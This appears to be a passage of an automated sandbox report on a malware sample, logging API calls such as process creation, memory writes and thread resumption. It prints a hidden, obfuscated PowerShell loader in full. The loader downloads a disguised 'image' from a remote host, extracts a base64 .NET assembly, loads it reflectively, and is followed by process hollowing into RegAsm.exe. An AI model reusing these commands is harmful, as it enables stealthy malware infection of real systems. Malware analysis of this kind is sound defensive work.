BJMvRwBloUfwwBJMvHQoUfwwBJMvVoUfwwBJMvB5oUfwwBJMvHoUfwwBJMvoUfwwBJMvZQoUfwwBJMvooUfwwBJMvCcoUfwwBJMvRgBpoUfwwBJMvGIoUfwwBJMvZQByoUfwwBJMvC4oUfwwBJMvSoUfwwBJMvBvoUfwwBJMvG0oUfwwBJMvZQoUfwwBJMvnoUfwwBJMvCkoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvG0oUfwwBJMvZQB0oUfwwBJMvGgoUfwwBJMvbwBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvdoUfwwBJMvB5oUfwwBJMvHoUfwwBJMvoUfwwBJMvZQoUfwwBJMvuoUfwwBJMvEcoUfwwBJMvZQB0oUfwwBJMvE0oUfwwBJMvZQB0oUfwwBJMvGgoUfwwBJMvbwBkoUfwwBJMvCgoUfwwBJMvJwBWoUfwwBJMvEEoUfwwBJMvSQoUfwwBJMvnoUfwwBJMvCkoUfwwBJMvLgBJoUfwwBJMvG4oUfwwBJMvdgBvoUfwwBJMvGsoUfwwBJMvZQoUfwwBJMvooUfwwBJMvCQoUfwwBJMvbgB1oUfwwBJMvGwoUfwwBJMvboUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvWwBvoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvBboUfwwBJMvF0oUfwwBJMvXQoUfwwBJMvgoUfwwBJMvCgoUfwwBJMvJwBkoUfwwBJMvEgoUfwwBJMvaoUfwwBJMvoUfwwBJMvwoUfwwBJMvEwoUfwwBJMvawBKoUfwwBJMvE8oUfwwBJMvUwBDoUfwwBJMvDkoUfwwBJMvegBkoUfwwBJMvDIoUfwwBJMvOQBroUfwwBJMvGIoUfwwBJMvbQBsoUfwwBJMvDMoUfwwBJMvToUfwwBJMvB6oUfwwBJMvEUoUfwwBJMvNQBMoUfwwBJMvGooUfwwBJMvWQB1oUfwwBJMvE8oUfwwBJMvRoUfwwBJMvBroUfwwBJMvHUoUfwwBJMvTQBUoUfwwBJMvFEoUfwwBJMveoUfwwBJMvBMoUfwwBJMvHkoUfwwBJMvOoUfwwBJMvoUfwwBJMv2oUfwwBJMvGMoUfwwBJMvSoUfwwBJMvBSoUfwwBJMvDoUfwwBJMvoUfwwBJMvYQBBoUfwwBJMvD0oUfwwBJMvPQoUfwwBJMvnoUfwwBJMvCoUfwwBJMvoUfwwBJMvLoUfwwBJMvoUfwwBJMvgoUfwwBJMvCcoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvGQoUfwwBJMvZgBkoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGYoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGYoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGEoUfwwBJMvZoUfwwBJMvBzoUfwwBJMvGEoUfwwBJMvJwoUfwwBJMvgoUfwwBJMvCwoUfwwBJMvIoUfwwBJMvoUfwwBJMvnoUfwwBJMvGQoUfwwBJMvZQoUfwwBJMvnoUfwwBJMvCoUfwwBJMvoUfwwBJMvLoUfwwBJMvoUfwwBJMvgoUfwwBJMvCcoUfwwBJMvYwB1oUfwwBJMvCcoUfwwBJMvKQoUfwwBJMvpoUfwwBJMvoUfwwBJMv==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

NtResumeThread

 thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2160
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2160
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2160
1 0 0

CreateProcessInternalW

 thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0

NtResumeThread

 thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2160
1 0 0

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x00000464
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x0000058c
suspend_count: 1
process_identifier: 2272
1 0 0

CreateProcessInternalW

 thread_identifier: 2572
thread_handle: 0x0000039c
process_identifier: 2568
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000003a4
1 1 0

NtGetContextThread

 thread_handle: 0x0000039c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000003a4
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELdò5eà  ¼îÛ à@  @…œÛOàF  H.textô» ¼ `.rsrcFà¾@@.reloc Ä@B
base_address: 0x00400000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe(LegalCopyright |)OriginalFilename4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer: Ð ð;
base_address: 0x00440000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447214
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000039c
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000001f4
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x00000234
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000002dc
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000003b4
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000003e4
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x00000528
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000005f0
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000003dc
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000006f0
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x0000037c
suspend_count: 1
process_identifier: 2568
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe